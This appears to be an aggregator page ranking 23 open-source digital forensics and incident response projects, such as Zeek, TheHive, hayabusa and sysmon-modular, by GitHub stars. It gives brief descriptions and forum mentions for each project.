Dfir

Top 23 Dfir Open-Source Projects

  • my-arsenal-of-aws-security-tools

    List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.

  • awesome-incident-response

    A curated list of tools for incident response

  • InfluxDB

    Power Real-Time Data Analytics at Scale. Get real-time insights from all types of time series data with InfluxDB. Ingest, query, and analyze billions of data points in real-time with unbounded cardinality.

  • LOLBAS

    Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)

    Project mention: How do i replicate GTFOBins layout ? | /r/web_design | 2023-12-05

    I have an idea for a simar style website that i would like to create, and i was going to use GTFOBins as a template and ammend to fit my data, much like LOLBAS has.

  • zeek

    Zeek is a powerful network analysis framework that is much different from the typical IDS you may know.

    Project mention: Suricata VS zeek - a user suggested alternative | libhunt.com/r/suricata | 2024-01-02
  • DetectionLab

    Automate the creation of a lab environment complete with security tooling and logging best practices

  • ThreatHunter-Playbook

    A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.

  • awesome-forensics

    A curated list of awesome forensic analysis tools and resources

    Project mention: A fun new feature we are working on in systemd: userspace-only reboot | news.ycombinator.com | 2023-07-06

    https://github.com/cugu/awesome-forensics#acquisition : Memory forensics acquisition tools: POFR: PenguinOS Flight Recorder, LIME

  • WorkOS

    The modern identity platform for B2B SaaS. The APIs are flexible and easy-to-use, supporting authentication, user identity, and complex enterprise features like SSO and SCIM provisioning.

  • Loki

    Loki - Simple IOC and YARA Scanner (by Neo23x0)

    Project mention: My Boss Downloaded and Opened a .lnk File and Installed a Malware in His Device | /r/computerforensics | 2023-06-06

    You should run a tool like loki for ioc scanning. This will identify persistence https://github.com/Neo23x0/Loki

  • TheHive

    TheHive: a Scalable, Open Source and Free Security Incident Response Platform

    Project mention: What are your go-to tools for task management and/or case work? | /r/cybersecurity | 2023-12-09

    I had a quick test with the hive looks pretty nice. https://thehive-project.org/

  • IntelOwl

    IntelOwl: manage your Threat Intelligence at scale

    Project mention: Monthly Security Checklist | /r/msp | 2023-06-25
  • chainsaw

    Rapidly Search and Hunt through Windows Forensic Artefacts

    Project mention: Agent event queue is flooded. Check the agent configuration | /r/Wazuh | 2023-06-30
  • timesketch

    Collaborative forensic timeline analysis

  • sysmon-modular

    A repository of sysmon configuration modules

    Project mention: Sysmon 15.0 is out now with advanced features | /r/sysadmin | 2023-06-29

    I was specifically using the https://github.com/olafhartong/sysmon-modular config, but once we started seeing systems crash I tried building extremely minimal configs and still found them causing hangs.

  • signature-base

    YARA signature and IOC database for my scanners and tools

  • EVTX-ATTACK-SAMPLES

    Windows Events Attack Samples

  • hayabusa

    Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.

    Project mention: Release v2.5.0 🦅 of Hayabusa - Hayabusa is a Windows event log fast forensics timeline generator and threat hunting tool | /r/blueteamsec | 2023-05-07
  • cyberchef-recipes

    A list of cyber-chef recipes and curated links

  • yeti

    Your Everyday Threat Intelligence

  • MemLabs

    Educational, CTF-styled labs for individuals interested in Memory Forensics

    Project mention: Platform for training digital forensics | /r/digitalforensics | 2023-04-21
  • matano

    Open source security data lake for threat hunting, detection & response, and cybersecurity analytics at petabyte scale on AWS

    Project mention: Cisco Acquires Splunk | news.ycombinator.com | 2023-09-21

    sorry thats https://matano.dev

  • beagle

    Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs. (by yampelo)

  • Cortex

    Cortex: a Powerful Observable Analysis and Active Response Engine (by TheHive-Project)

  • threathunting

    A Splunk app mapped to MITRE ATT&CK to guide your threat hunts

  • SaaSHub

    SaaSHub - Software Alternatives and Reviews. SaaSHub helps you find the best software and product alternatives

NOTE: The open source projects on this list are ordered by number of github stars. The number of mentions indicates repo mentiontions in the last 12 Months or since we started tracking (Dec 2020). The latest post mention was on 2024-01-02.

Dfir related posts

Index

What are some of the best open-source Dfir projects? This list will help you:

Project Stars
1 my-arsenal-of-aws-security-tools 8,642
2 awesome-incident-response 7,038
3 LOLBAS 6,500
4 zeek 5,852
5 DetectionLab 4,476
6 ThreatHunter-Playbook 3,805
7 awesome-forensics 3,512
8 Loki 3,189
9 TheHive 3,166
10 IntelOwl 3,072
11 chainsaw 2,502
12 timesketch 2,470
13 sysmon-modular 2,463
14 signature-base 2,269
15 EVTX-ATTACK-SAMPLES 2,067
16 hayabusa 1,890
17 cyberchef-recipes 1,881
18 yeti 1,609
19 MemLabs 1,520
20 matano 1,334
21 beagle 1,250
22 Cortex 1,237
23 threathunting 1,099
SaaSHub - Software Alternatives and Reviews
SaaSHub helps you find the best software and product alternatives
www.saashub.com